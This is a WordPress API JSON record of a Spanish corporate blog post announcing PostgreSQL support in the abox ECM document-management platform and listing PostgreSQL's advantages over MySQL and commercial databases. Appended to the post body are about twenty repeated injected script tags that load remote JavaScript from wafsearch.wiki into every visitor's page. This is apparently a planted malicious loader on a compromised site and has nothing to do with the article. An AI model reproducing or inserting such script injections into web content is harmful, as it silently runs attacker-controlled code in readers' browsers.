{"id":2924,"date":"2016-08-23T21:58:06","date_gmt":"2016-08-24T02:58:06","guid":{"rendered":"https:\/\/149.56.148.186\/?p=2001"},"modified":"2026-03-20T04:12:48","modified_gmt":"2026-03-20T09:12:48","slug":"nueva-opcion-de-abox-ecm-sobre-postgresql-base-de-datos-relacional-open-source","status":"publish","type":"post","link":"https:\/\/www.adapting.com\/en\/nueva-opcion-de-abox-ecm-sobre-postgresql-base-de-datos-relacional-open-source\/","title":{"rendered":"Nueva opci\u00f3n de abox ECM sobre PostgreSQL: base de datos relacional open-source"},"content":{"rendered":"<p style=\"text-align: justify;\"><strong>Adapting Lab<\/strong>, el laboratorio de I+D de Adapting, acaba de lanzar una nueva versi\u00f3n de su plataforma abox ECM que soporta la popular base de datos open-source <strong>PostgreSQL<\/strong>.\u00a0Este movimiento viene dado por la estrategia de Adapting de potenciar su neutralidad tecnol\u00f3gica apostando por la mejor opci\u00f3n para cada cliente.<\/p>\n<p style=\"text-align: justify;\">De esta forma, abox se convierte en una de las soluciones de software documental profesional m\u00e1s vers\u00e1tiles del mercado con posibilidad de ser acoplado con<strong> 3 tecnolog\u00edas diferentes de base de datos<\/strong>: Sql Server, Oracle y PostgreSQL.<\/p>\n<p style=\"text-align: justify;\"><a href=\"https:\/\/www.adapting.com\/wp-content\/uploads\/2014\/01\/sql.jpg\"><img loading=\"lazy\" class=\"size-full wp-image-264 alignleft\" src=\"https:\/\/www.adapting.com\/wp-content\/uploads\/2014\/01\/sql.jpg\" alt=\"sql\" width=\"180\" height=\"105\" \/><\/a><a href=\"https:\/\/www.adapting.com\/wp-content\/uploads\/2014\/01\/oracle.jpg\"><img loading=\"lazy\" class=\"size-full wp-image-261 alignleft\" src=\"https:\/\/www.adapting.com\/wp-content\/uploads\/2014\/01\/oracle.jpg\" alt=\"oracle\" width=\"180\" height=\"105\" \/><\/a><a href=\"https:\/\/www.adapting.com\/wp-content\/uploads\/2014\/01\/postgre.jpg\"><img loading=\"lazy\" class=\"size-full wp-image-262 alignnone\" src=\"https:\/\/www.adapting.com\/wp-content\/uploads\/2014\/01\/postgre.jpg\" alt=\"postgre\" width=\"180\" height=\"105\" srcset=\"https:\/\/www.adapting.com\/wp-content\/uploads\/2014\/01\/postgre.jpg 180w, https:\/\/www.adapting.com\/wp-content\/uploads\/2014\/01\/postgre-768x448.jpg 768w, https:\/\/www.adapting.com\/wp-content\/uploads\/2014\/01\/postgre-600x350.jpg 600w\" sizes=\"(max-width: 180px) 100vw, 180px\" \/><\/a><\/p>\n<p style=\"text-align: justify;\"><strong>PostgreSQL<\/strong> es un sistema de gesti\u00f3n de base de datos relacional orientada a objetos y libre, publicado bajo la licencia BSD. El desarrollo de esta base de datos es dirigida por una comunidad de desarrolladores que trabajan de forma altruista y libre, denominada el PGDG (<a href=\"https:\/\/www.postgresql.org\/\" target=\"_blank\" rel=\"noopener\">PostgreSQL Global Development Group<\/a>).<\/p>\n<p style=\"text-align: justify;\"><strong>PostgreSQL<\/strong> utiliza un modelo cliente\/servidor y usa multiprocesos en vez de multihilos para garantizar la estabilidad del sistema. Un fallo en uno de los procesos no afectar\u00e1 el resto y el sistema continuar\u00e1 funcionando.<\/p>\n<h3 style=\"text-align: justify;\"><b>Ventajas:<\/b><\/h3>\n<ul style=\"text-align: justify;\">\n<li>Alta concurrencia (mediante MVCC).<\/li>\n<li>Multitud de tipos de campos nativos.<\/li>\n<li>Integridad transacional.<\/li>\n<li>Hot-Standby, permite a los usuarios de la aplicaci\u00f3n hacer b\u00fasquedas (s\u00f3lo lectura) en los servidores mientras est\u00e1n en modo de recuperaci\u00f3n o espera.<\/li>\n<li>Licencia BSD (se permite la utilizaci\u00f3n del c\u00f3digo para ser comercializado).<\/li>\n<li>Copias de seguridad en caliente.<\/li>\n<li>Es una base de datos ACID (Atomicidad, Coherencia, Aislamiento y Durabilidad).<\/li>\n<li>Soporta el almacenamiento de objetos binarios grandes.<\/li>\n<li>Multiplataforma.<\/li>\n<li>Gran capacidad de almacenamiento.<\/li>\n<li>Administrador gr\u00e1fico intuitivo &#8216;pgAdmin&#8217;.<\/li>\n<li>Herencia de tablas.<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Frente a la opci\u00f3n de <strong>MySQL<\/strong> podemos aportar los argumentos de que MySQL puede presentar problemas de integridad en entornos con alta concurrencia en la edici\u00f3n de registros, el desarrollo con MySQL obliga a utilizar la licencia GPL GNU y el argumento m\u00e1s importante a nuestro juicio, que esta base de datos open-source es propiedad de <strong>Oracle<\/strong>, lo que puede representar una incertidumbre respecto a su futura evoluci\u00f3n.<\/p>\n<p style=\"text-align: justify;\">Frente a las opciones comerciales, algunos de nuestros partners se han decantado por esta soluci\u00f3n debido a los elevados <strong>costos de licenciamiento<\/strong> que supone hoy d\u00eda un servidor de altas prestaciones dotado de Oracle o Sql Server.<\/p>\n<p style=\"text-align: justify;\"><a href=\"https:\/\/www.digitalocean.com\/community\/tutorials\/sqlite-vs-mysql-vs-postgresql-a-comparison-of-relational-database-management-systems\" target=\"_blank\" rel=\"noopener\">Consulte este art\u00edculo sobre una reciente comparativa entre bases de datos relacionales open-source.<\/a><\/p>\n<p><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/usa';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Adapting Lab, el laboratorio de I+D de Adapting, acaba de lanzar una nueva versi\u00f3n de su plataforma abox ECM que soporta la popular base de datos open-source PostgreSQL.\u00a0Este movimiento viene dado por la estrategia de Adapting de potenciar su neutralidad tecnol\u00f3gica apostando por la mejor opci\u00f3n para cada cliente. De esta forma, abox se convierte [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":2002,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[255,257,262],"tags":[168,169],"amp_validity":null,"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/www.adapting.com\/en\/wp-json\/wp\/v2\/posts\/2924\/"}],"collection":[{"href":"https:\/\/www.adapting.com\/en\/wp-json\/wp\/v2\/posts\/"}],"about":[{"href":"https:\/\/www.adapting.com\/en\/wp-json\/wp\/v2\/types\/post\/"}],"author":[{"embeddable":true,"href":"https:\/\/www.adapting.com\/en\/wp-json\/wp\/v2\/users\/3\/"}],"replies":[{"embeddable":true,"href":"https:\/\/www.adapting.com\/en\/wp-json\/wp\/v2\/comments\/?post=2924"}],"version-history":[{"count":21,"href":"https:\/\/www.adapting.com\/en\/wp-json\/wp\/v2\/posts\/2924\/revisions\/"}],"predecessor-version":[{"id":13604,"href":"https:\/\/www.adapting.com\/en\/wp-json\/wp\/v2\/posts\/2924\/revisions\/13604\/"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.adapting.com\/en\/wp-json\/wp\/v2\/media\/2002\/"}],"wp:attachment":[{"href":"https:\/\/www.adapting.com\/en\/wp-json\/wp\/v2\/media\/?parent=2924"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.adapting.com\/en\/wp-json\/wp\/v2\/categories\/?post=2924"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.adapting.com\/en\/wp-json\/wp\/v2\/tags\/?post=2924"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}